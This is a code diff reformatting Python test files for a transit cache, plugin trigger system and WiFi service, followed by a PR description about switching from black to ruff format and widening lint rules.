     def test_cache_hits_tracking(self, mock_regional_response):
         """Test that cache hits are tracked."""
         cache = TransitCache()
         cache._parse_and_index(mock_regional_response)
         cache._last_success = time.time()
-        
+
         initial_hits = cache.get_status()["cache_hits"]
-        
+
         # Access cache multiple times
         cache.get_stops_data("SF", ["15210"])
         cache.get_stops_data("SF", ["15210"])
         cache.get_stops_data("BA", ["12TH"])
-        
+
         final_hits = cache.get_status()["cache_hits"]
         assert final_hits == initial_hits + 3
 
 
 class TestTransitCacheIntegration:
     """Integration tests for transit cache with real-ish scenarios."""
-    
-    @patch('src.utils.transit_cache.requests.get')
+
+    @patch("src.utils.transit_cache.requests.get")
     def test_multiple_agencies(self, mock_get):
         """Test caching data from multiple transit agencies."""
         response_data = {
@@ -266,8 +262,8 @@ class TestTransitCacheIntegration:
                                 "MonitoredCall": {
                                     "StopPointRef": "SF_15210",
                                     "StopPointName": "Judah St",
-                                    "ExpectedArrivalTime": "2024-12-26T10:05:00-08:00"
-                                }
+                                    "ExpectedArrivalTime": "2024-12-26T10:05:00-08:00",
+                                },
                             }
                         },
                         # BART
@@ -278,8 +274,8 @@ class TestTransitCacheIntegration:
                                 "MonitoredCall": {
                                     "StopPointRef": "BA_EMBR",
                                     "StopPointName": "Embarcadero",
-                                    "ExpectedArrivalTime": "2024-12-26T10:03:00-08:00"
-                                }
+                                    "ExpectedArrivalTime": "2024-12-26T10:03:00-08:00",
+                                },
                             }
                         },
                         # Caltrain
@@ -290,40 +286,37 @@ class TestTransitCacheIntegration:
                                 "MonitoredCall": {
                                     "StopPointRef": "CT_SF",
                                     "StopPointName": "San Francisco",
-                                    "ExpectedArrivalTime": "2024-12-26T10:15:00-08:00"
-                                }
+                                    "ExpectedArrivalTime": "2024-12-26T10:15:00-08:00",
+                                },
                             }
-                        }
+                        },
                     ]
                 }
             }
         }
-        
+
         mock_response = Mock()
         mock_response.status_code = 200
         mock_response.text = json.dumps(response_data)
         mock_response.raise_for_status = Mock()
         mock_get.return_value = mock_response
-        
+
         cache = TransitCache()
         cache.configure(api_key="test-key", enabled=True)
         cache._refresh_data()
-        
+
         # Verify all agencies are cached
         status = cache.get_status()
         assert "SF" in status["agencies_cached"]
         assert "BA" in status["agencies_cached"]
         assert "CT" in status["agencies_cached"]
-        
+
         # Verify we can access each agency's data
         sf_data = cache.get_stops_data("SF", ["15210"])
         assert len(sf_data["15210"]) == 1
-        
+
         ba_data = cache.get_stops_data("BA", ["EMBR"])
         assert len(ba_data["EMBR"]) == 1
-        
+
         ct_data = cache.get_stops_data("CT", ["SF"])
         assert len(ct_data["SF"]) == 1
-
-
-

--- a/tests/test_trigger_platform_plumbing.py
+++ b/tests/test_trigger_platform_plumbing.py
@@ -9,8 +9,6 @@ Covers the three platform improvements introduced for plugin authors:
 3. The :class:`TriggerPriority` published priority scale.
 """
 
-from typing import List
-
 import pytest
 
 from src.plugins.base import PluginBase, PluginResult, TriggerResult
@@ -25,7 +23,6 @@ from src.triggers.service import (
     get_trigger_service,
     reset_trigger_service,
 )
-
 
 # ---------------------------------------------------------------------------
 # Helpers
@@ -42,7 +39,7 @@ class _TriggerPlugin(PluginBase):
     def fetch_data(self) -> PluginResult:
         return PluginResult(available=True, data={})
 
-    def check_triggers(self) -> List[TriggerResult]:
+    def check_triggers(self) -> list[TriggerResult]:
         return []
 
 
@@ -99,9 +96,7 @@ class TestTriggerPageIdInjection:
     def test_field_not_injected_when_supports_triggers_false(self):
         data = _make_manifest(supports_triggers=False)
         manifest = PluginManifest.from_dict(data)
-        assert "trigger_page_id" not in manifest.settings_schema.get(
-            "properties", {}
-        )
+        assert "trigger_page_id" not in manifest.settings_schema.get("properties", {})
 
     def test_author_override_wins(self):
         """If a plugin author declares ``trigger_page_id`` themselves, keep it."""
@@ -226,9 +221,7 @@ class TestFireTrigger:
         """A TriggerResult with triggered=False must be ignored."""
         plugin = _TriggerPlugin(_make_manifest(supports_triggers=True))
         plugin.enabled = True
-        plugin.fire_trigger(
-            TriggerResult(triggered=False, trigger_id="not_yet")
-        )
+        plugin.fire_trigger(TriggerResult(triggered=False, trigger_id="not_yet"))
         assert get_trigger_service().list_active_triggers() == []
 
     def test_fire_trigger_defaults_trigger_id_to_plugin_id(self):
@@ -236,9 +229,7 @@ class TestFireTrigger:
         the service dict key stays stable (rather than ``""``)."""
         plugin = _TriggerPlugin(_make_manifest(supports_triggers=True))
         plugin.enabled = True
-        plugin.fire_trigger(
-            TriggerResult(triggered=True, message="No ID supplied")
-        )
+        plugin.fire_trigger(TriggerResult(triggered=True, message="No ID supplied"))
         service = get_trigger_service()
         active = service.list_active_triggers()
         assert len(active) == 1

--- a/tests/test_trigger_render_path.py
+++ b/tests/test_trigger_render_path.py
@@ -15,7 +15,6 @@ no plugin discovery / filesystem state leaks across runs. They follow
 the fixture style established in ``tests/test_plugin_triggers.py``.
 """
 
-from typing import List
 from unittest.mock import Mock, patch
 
 import pytest
@@ -26,7 +25,6 @@ from src.pages.service import PageService
 from src.pages.storage import PageStorage
 from src.plugins.base import PluginBase, PluginResult, TriggerResult
 from src.triggers.service import TriggerService
-
 
 # -- Shared plugin fixtures --------------------------------------------------
 
@@ -68,7 +66,7 @@ class _RecordingTriggerPlugin(PluginBase):
     def fetch_data(self) -> PluginResult:
         return PluginResult(available=True, data={})
 
-    def check_triggers(self) -> List[TriggerResult]:
+    def check_triggers(self) -> list[TriggerResult]:
         return self._triggers
 
 
@@ -86,11 +84,7 @@ class _FakeRegistry:
     @property
     def trigger_plugins(self):
         # Mirror real registry: only enabled, trigger-supporting plugins.
-        return {
-            pid: p
-            for pid, p in self._plugins.items()
-            if p.enabled and p.supports_triggers
-        }
+        return {pid: p for pid, p in self._plugins.items() if p.enabled and p.supports_triggers}
 
     def get_plugin(self, plugin_id):
         return self._plugins.get(plugin_id)
@@ -135,9 +129,11 @@ def patch_services(trigger_service, page_service):
     """
     registry = _FakeRegistry()
 
-    with patch("src.plugins.registry.get_plugin_registry", return_value=registry), \
-         patch("src.main.get_trigger_service", return_value=trigger_service), \
-         patch("src.pages.service.get_page_service", return_value=page_service):
+    with (
+        patch("src.plugins.registry.get_plugin_registry", return_value=registry),
+        patch("src.main.get_trigger_service", return_value=trigger_service),
+        patch("src.pages.service.get_page_service", return_value=page_service),
+    ):
         yield registry
 
 
@@ -200,9 +196,7 @@ class TestTriggerPageIdPath:
 
         content = display_service._check_trigger_override()
 
-        assert content is not None, (
-            "Expected the configured page to render, not None"
-        )
+        assert content is not None, "Expected the configured page to render, not None"
         # The template references {{trigger_plugin.event_name}} — proves
         # that data is namespaced under the plugin id, not flattened.
         assert "STANDUP" in content
@@ -217,9 +211,7 @@ class TestTriggerPageIdPath:
 class TestFallbackToFormattedLines:
     """Without a configured trigger page, formatted_lines win."""
 
-    def test_no_trigger_page_id_uses_formatted_lines_verbatim(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_no_trigger_page_id_uses_formatted_lines_verbatim(self, display_service, patch_services, trigger_service):
         plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN)
         plugin.enabled = True
         plugin.config = {}  # no trigger_page_id
@@ -252,9 +244,7 @@ class TestFallbackToMessage:
     """If neither trigger_page_id nor formatted_lines are present, the
     plain ``message`` is rendered."""
 
-    def test_message_rendered_when_no_formatted_lines(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_message_rendered_when_no_formatted_lines(self, display_service, patch_services, trigger_service):
         plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN)
         plugin.enabled = True
         plugin.config = {}
@@ -275,9 +265,7 @@ class TestFallbackToMessage:
         content = display_service._check_trigger_override()
         assert content == "AQI ABOVE 150"
 
-    def test_returns_none_when_no_content_at_all(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_returns_none_when_no_content_at_all(self, display_service, patch_services, trigger_service):
         """A trigger with neither formatted_lines nor message returns None.
 
         This is the documented behavior of ``_check_trigger_override``:
@@ -313,9 +301,7 @@ class TestMissingPage:
     should fall back gracefully to the trigger's formatted_lines/message.
     """
 
-    def test_missing_page_falls_back_to_formatted_lines(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_missing_page_falls_back_to_formatted_lines(self, display_service, patch_services, trigger_service):
         plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN)
         plugin.enabled = True
         plugin.config = {"trigger_page_id": "page-does-not-exist"}
@@ -388,15 +374,11 @@ class TestPluginIdNamespacing:
         # Both plugins have the same trigger_page_id wired up so we can
         # observe which plugin's data ends up in the context regardless
         # of which one wins.
-        winning_plugin = _RecordingTriggerPlugin(
-            MANIFEST_TRIGGER_PLUGIN, plugin_id="trigger_plugin"
-        )
+        winning_plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN, plugin_id="trigger_plugin")
         winning_plugin.enabled = True
         winning_plugin.config = {"trigger_page_id": page.id}
 
-        losing_plugin = _RecordingTriggerPlugin(
-            MANIFEST_OTHER_TRIGGER_PLUGIN, plugin_id="other_trigger_plugin"
-        )
+        losing_plugin = _RecordingTriggerPlugin(MANIFEST_OTHER_TRIGGER_PLUGIN, plugin_id="other_trigger_plugin")
         losing_plugin.enabled = True
         losing_plugin.config = {"trigger_page_id": page.id}
 
@@ -449,9 +431,7 @@ class TestSilenceMode:
     that level by patching ``Config.is_silence_mode_active``.
     """
 
-    def test_active_trigger_is_skipped_during_silence(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_active_trigger_is_skipped_during_silence(self, display_service, patch_services, trigger_service):
         plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN)
         plugin.enabled = True
         plugin.config = {}
@@ -504,9 +484,7 @@ class TestManualPageChangeDismissesTriggers:
     same contract the API endpoint depends on.
     """
 
-    def test_manual_change_dismisses_and_records_suppression(
-        self, display_service, patch_services, trigger_service
-    ):
+    def test_manual_change_dismisses_and_records_suppression(self, display_service, patch_services, trigger_service):
         plugin = _RecordingTriggerPlugin(MANIFEST_TRIGGER_PLUGIN)
         plugin.enabled = True
         plugin.config = {}
@@ -528,8 +506,7 @@ class TestManualPageChangeDismissesTriggers:
         dismissed = trigger_service.dismiss_active_for_user_override()
         assert dismissed == 1
         assert "evt_sticky" in trigger_service._suppressed_until, (
-            "Manual page change must record the dismissal in _suppressed_until "
-            "so re-emissions are suppressed"
+            "Manual page change must record the dismissal in _suppressed_until so re-emissions are suppressed"
         )
 
         # Override now returns None — no trigger is active.
@@ -550,17 +527,11 @@ class TestSendTriggerContent:
     actually skips identical sends and that successful sends update the
     cache."""
 
-    def test_sends_content_when_different_from_cache(
-        self, display_service
-    ):
+    def test_sends_content_when_different_from_cache(self, display_service):
         with patch("src.main.get_settings_service") as settings_svc:
             inst = Mock()
-            inst.get_board_settings.return_value = Mock(
-                boards=[{"device_type": "flagship"}]
-            )
-            inst.get_transition_settings.return_value = Mock(
-                strategy=None, step_interval_ms=500, step_size=1
-            )
+            inst.get_board_settings.return_value = Mock(boards=[{"device_type": "flagship"}])
+            inst.get_transition_settings.return_value = Mock(strategy=None, step_interval_ms=500, step_size=1)
             settings_svc.return_value = inst
 
             sent = display_service._send_trigger_content("HELLO TRIGGER")

--- a/tests/test_wifi_service.py
+++ b/tests/test_wifi_service.py
@@ -15,10 +15,10 @@ import pytest
 from src.network import wifi
 from src.network.wifi import WiFiError, WiFiService
 
-
 # ---------------------------------------------------------------------------
 # Helpers
 # ---------------------------------------------------------------------------
+
 
 def _force_available(svc: WiFiService) -> None:
     """Skip the env/binary/dbus probe so tests can run anywhere."""
@@ -36,6 +36,7 @@ def _mock_completed(stdout: str = "", returncode: int = 0) -> MagicMock:
 # ---------------------------------------------------------------------------
 # capability()
 # ---------------------------------------------------------------------------
+
 
 class TestCapability:
     def test_unavailable_off_pi(self, monkeypatch):
@@ -68,8 +69,10 @@ class TestCapability:
 
     def test_available(self, monkeypatch):
         monkeypatch.setenv("FIESTABOARD_PROFILE", "pi")
-        with patch("src.network.wifi.shutil.which", return_value="/usr/bin/nmcli"), \
-                patch("src.network.wifi.Path") as mock_path:
+        with (
+            patch("src.network.wifi.shutil.which", return_value="/usr/bin/nmcli"),
+            patch("src.network.wifi.Path") as mock_path,
+        ):
             p = MagicMock()
             p.exists.return_value = True
             mock_path.return_value = p
@@ -93,6 +96,7 @@ class TestCapability:
 # _require_available
 # ---------------------------------------------------------------------------
 
+
 class TestRequireAvailable:
     def test_raises_when_unavailable(self, monkeypatch):
         monkeypatch.delenv("FIESTABOARD_PROFILE", raising=False)
@@ -105,12 +109,12 @@ class TestRequireAvailable:
 # _run_nmcli
 # ---------------------------------------------------------------------------
 
+
 class TestRunNmcli:
     def test_success_returns_stdout(self):
         svc = WiFiService()
         _force_available(svc)
-        with patch("src.network.wifi.subprocess.run",
-                   return_value=_mock_completed("hello\n")):
+        with patch("src.network.wifi.subprocess.run", return_value=_mock_completed("hello\n")):
             assert svc._run_nmcli(["--version"]) == "hello\n"
 
     def test_missing_binary_raises(self):
@@ -131,9 +135,7 @@ class TestRunNmcli:
     def test_nonzero_exit_surfaces_stderr(self):
         svc = WiFiService()
         _force_available(svc)
-        err = subprocess.CalledProcessError(
-            returncode=4, cmd=["nmcli"], output="", stderr="not authorized"
-        )
+        err = subprocess.CalledProcessError(returncode=4, cmd=["nmcli"], output="", stderr="not authorized")
         with patch("src.network.wifi.subprocess.run", side_effect=err):
             with pytest.raises(WiFiError, match="not authorized"):
                 svc._run_nmcli(["connection", "up", "wifi"])
@@ -143,11 +145,10 @@ class TestRunNmcli:
 # _redact_args
 # ---------------------------------------------------------------------------
 
+
 class TestRedactArgs:
     def test_psk_value_redacted(self):
-        redacted = wifi._redact_args(
-            ["nmcli", "connection", "add", "wifi-sec.psk", "hunter2", "ssid", "x"]
-        )
+        redacted = wifi._redact_args(["nmcli", "connection", "add", "wifi-sec.psk", "hunter2", "ssid", "x"])
         assert "hunter2" not in redacted
         assert "***" in redacted
 
@@ -163,6 +164,7 @@ class TestRedactArgs:
 # ---------------------------------------------------------------------------
 # _parse_terse
 # ---------------------------------------------------------------------------
+
 
 class TestParseTerse:
     def test_simple_fields(self):
@@ -181,16 +183,13 @@ class TestParseTerse:
 # scan()
 # ---------------------------------------------------------------------------
 
+
 class TestScan:
     def test_dedupe_by_ssid_keeps_strongest(self):
         svc = WiFiService()
         _force_available(svc)
         # Same SSID twice (different APs / channels) — keep signal=80, drop 40.
-        nmcli_out = (
-            "*:HomeNet:80:WPA2\n"
-            ":HomeNet:40:WPA2\n"
-            ":GuestNet:55:WPA2\n"
-        )
+        nmcli_out = "*:HomeNet:80:WPA2\n:HomeNet:40:WPA2\n:GuestNet:55:WPA2\n"
         with patch.object(svc, "_run_nmcli", return_value=nmcli_out):
             results = svc.scan()
         ssids = {n.ssid: n for n in results}
@@ -214,15 +213,12 @@ class TestScan:
 # saved_networks()
 # ---------------------------------------------------------------------------
 
+
 class TestSavedNetworks:
     def test_filters_to_wifi_profiles(self):
         svc = WiFiService()
         _force_available(svc)
-        out = (
-            "HomeNet:802-11-wireless:yes\n"
-            "Wired connection 1:802-3-ethernet:yes\n"
-            "Hotel WiFi:802-11-wireless:no\n"
-        )
+        out = "HomeNet:802-11-wireless:yes\nWired connection 1:802-3-ethernet:yes\nHotel WiFi:802-11-wireless:no\n"
         with patch.object(svc, "_run_nmcli", return_value=out):
             saved = svc.saved_networks()
         names = {s.name for s in saved}
@@ -237,14 +233,16 @@ class TestSavedNetworks:
 # status()
 # ---------------------------------------------------------------------------
 
+
 class TestStatus:
     def test_not_connected(self):
         svc = WiFiService()
         _force_available(svc)
         # No active wifi connection → connected=False, no IP/SSID.
-        with patch.object(svc, "_run_nmcli", return_value="Wired:802-3-ethernet:eth0\n"), \
-                patch("src.network.wifi.check_internet_connectivity",
-                      return_value={"ok": True}):
+        with (
+            patch.object(svc, "_run_nmcli", return_value="Wired:802-3-ethernet:eth0\n"),
+            patch("src.network.wifi.check_internet_connectivity", return_value={"ok": True}),
+        ):
             status = svc.status()
         assert status.connected is False
         assert status.ssid is None
@@ -262,9 +260,10 @@ class TestStatus:
         # Return different stdout per call: 1st = connection.show --active,
         # 2nd = connection.show <name> details, 3rd = device wifi list.
         outputs = iter([active_out, detail_out, scan_out])
-        with patch.object(svc, "_run_nmcli", side_effect=lambda *a, **kw: next(outputs)), \
-                patch("src.network.wifi.check_internet_connectivity",
-                      return_value={"ok": True}):
+        with (
+            patch.object(svc, "_run_nmcli", side_effect=lambda *a, **kw: next(outputs)),
+            patch("src.network.wifi.check_internet_connectivity", return_value={"ok": True}),
+        ):
             status = svc.status()
         assert status.connected is True
         assert status.ssid == "HomeNet"
@@ -277,6 +276,7 @@ class TestStatus:
 # connect()
 # ---------------------------------------------------------------------------
 
+
 class TestConnect:
     def test_connect_happy_path(self):
         svc = WiFiService()
@@ -284,18 +284,24 @@ class TestConnect:
 
         # connect() calls _run_nmcli several times: delete (may fail),
         # add, up. Then it calls _run_nm_online and status().
-        with patch.object(svc, "_run_nmcli") as run, \
-                patch.object(svc, "_run_nm_online", return_value=True), \
-                patch.object(svc, "status",
-                             return_value=wifi.WiFiStatus(
-                                 connected=True, ssid="HomeNet",
-                                 ip_address="192.168.1.42",
-                                 gateway="192.168.1.1", signal=80,
-                                 internet_reachable=True)):
+        with (
+            patch.object(svc, "_run_nmcli") as run,
+            patch.object(svc, "_run_nm_online", return_value=True),
+            patch.object(
+                svc,
+                "status",
+                return_value=wifi.WiFiStatus(
+                    connected=True,
+                    ssid="HomeNet",
+                    ip_address="192.168.1.42",
+                    gateway="192.168.1.1",
+                    signal=80,
+                    internet_reachable=True,
+                ),
+            ),
+        ):
             run.return_value = ""
-            result = asyncio.run(
-                svc.connect(ssid="HomeNet", password="hunter2")
-            )
+            result = asyncio.run(svc.connect(ssid="HomeNet", password="hunter2"))
         assert result.connectivity_confirmed is True
         assert result.status.ssid == "HomeNet"
         # The PSK must be inside the add call args list.
@@ -307,13 +313,17 @@ class TestConnect:
     def test_connect_without_internet_warns(self):
         svc = WiFiService()
         _force_available(svc)
-        with patch.object(svc, "_run_nmcli", return_value=""), \
-                patch.object(svc, "_run_nm_online", return_value=False), \
-                patch.object(svc, "status",
-                             return_value=wifi.WiFiStatus(
-                                 connected=True, ssid="HomeNet",
-                                 ip_address=None, gateway=None, signal=None,
-                                 internet_reachable=False)):
+        with (
+            patch.object(svc, "_run_nmcli", return_value=""),
+            patch.object(svc, "_run_nm_online", return_value=False),
+            patch.object(
+                svc,
+                "status",
+                return_value=wifi.WiFiStatus(
+                    connected=True, ssid="HomeNet", ip_address=None, gateway=None, signal=None, internet_reachable=False
+                ),
+            ),
+        ):
             result = asyncio.run(svc.connect(ssid="HomeNet", password="x"))
         assert result.connectivity_confirmed is False
         assert "could not verify" in result.message.lower()
@@ -352,12 +362,12 @@ class TestConnect:
 # disconnect() / forget()
 # ---------------------------------------------------------------------------
 
+
 class TestDisconnectForget:
     def test_disconnect_raises_when_no_wifi_active(self):
         svc = WiFiService()
         _force_available(svc)
-        with patch.object(svc, "_run_nmcli",
-                          return_value="Wired:802-3-ethernet\n"):
+        with patch.object(svc, "_run_nmcli", return_value="Wired:802-3-ethernet\n"):
             with pytest.raises(WiFiError, match="No active WiFi"):
                 asyncio.run(svc.disconnect())
 
@@ -367,13 +377,16 @@ class TestDisconnectForget:
 
         active = "HomeNet:802-11-wireless\n"
         outputs = iter([active, ""])  # show --active, then `connection down`
-        with patch.object(svc, "_run_nmcli",
-                          side_effect=lambda *a, **kw: next(outputs)), \
-                patch.object(svc, "status",
-                             return_value=wifi.WiFiStatus(
-                                 connected=False, ssid=None, ip_address=None,
-                                 gateway=None, signal=None,
-                                 internet_reachable=False)):
+        with (
+            patch.object(svc, "_run_nmcli", side_effect=lambda *a, **kw: next(outputs)),
+            patch.object(
+                svc,
+                "status",
+                return_value=wifi.WiFiStatus(
+                    connected=False, ssid=None, ip_address=None, gateway=None, signal=None, internet_reachable=False
+                ),
+            ),
+        ):
             status = asyncio.run(svc.disconnect())
         assert status.connected is False
 
@@ -394,6 +407,7 @@ class TestDisconnectForget:
 # ---------------------------------------------------------------------------
 # get_wifi_service singleton
 # ---------------------------------------------------------------------------
+
 
 def test_singleton_returns_same_instance():
     wifi._service = None  # reset for the test


### PR DESCRIPTION
## Summary

Companion to #891 (JS/TS linting). Same mandate — AI writes most of this code, so let the linter do as much tidying as it reasonably can.

**What changes**
- **Drop `black`** in favor of `ruff format`. Same Black-compatible output, one fewer tool/dep. New `[tool.ruff.format]` block in `pyproject.toml`.
- **Expand the `ruff check` rule set** from `E,W,F,I,B,C4,UP` to also include:
  - `SIM` (flake8-simplify) — collapse redundant conditionals
  - `RUF` — ruff-specific (mutable defaults, implicit Optional)
  - `PIE` — misc cleanups
  - `RET` — simplify returns
  - `PTH` — `os.path` → `pathlib`
  - `TID` — tidy imports
- **Extend lint scope** from `src/ plugins/` to `src/ plugins/ tests/ scripts/`.
- **Wire `ruff format --check`** into CI (replaces the previous redundant `py_compile` syntax check; ruff already parses every file during lint).
- **Add `scripts/**` to the `api` path filter** so script changes trigger the Platform Tests job (and its new lint coverage).
- **All 1956 detected issues resolved**: 691 by `ruff check --fix --unsafe-fixes`, ~1135 by `ruff format`, **54 by hand**. Notable hand-fixes:
  - PTH cluster (~37): converted `os.path`/`open()` to pathlib, with carefully-scoped `# noqa` exceptions where pathlib breaks test patching (`builtins.open`) or CodeQL `py/path-injection` barrier analysis (`src/plugins/sources.py`).
  - 2 real bugs: `tests/test_system_endpoints.py` used `Dict`/`Any` without imports — modernized to `dict[str, Any]`.
  - 3 `pytest.raises(Exception)` narrowed to `pytest.raises(ValidationError)`.
  - 4 bare `except:` → `except Exception:`.

**Strategy notes (per request to evaluate the approach):**
1. **Dropping black is the biggest improvement.** Two formatters configured but only one (ruff) wired to CI was just drift waiting to happen. Ruff format is byte-identical to black for this code style.
2. **Scope extension matters more than the new rules.** `tests/` and `scripts/` had zero lint coverage before; they're where AI-generated code tends to get sloppiest.
3. **Skipped rule families**: `N` (naming — too noisy across plugin manifests and test fixtures), `PL` (pylint subset — too opinionated for the size of this PR), `T20` (print statements — fine in CLI scripts), `D` (docstrings — separate workstream).
4. **No mypy/pyright**: out of scope (and the plugin loader's dynamic `importlib.import_module()` calls would need substantial annotation work first).

## Test plan

- [x] `ruff check src/ plugins/ tests/ scripts/` → 0 errors
- [x] `ruff format --check src/ plugins/ tests/ scripts/` → clean (216 files)
- [x] `pytest tests/ -m 'not integration'` → 3664 passed, 5 skipped, 12 deselected
- [ ] CI `test-platform` job passes (lint + format + tests + coverage gate)
- [ ] CI `test-plugins` job passes (per-plugin 80% coverage)

## Follow-ups (separate PRs)

- Type checking (mypy or pyright) — would require annotating plugin loader's dynamic imports
- N (naming) and D (docstring) rule families — defer to per-area PRs
- Tighten `# noqa: PTH123` test couplings: refactor the affected services to inject the file accessor so tests don't need to patch `builtins.open`

🤖 Generated with [Claude Code](https://claude.com/claude-code)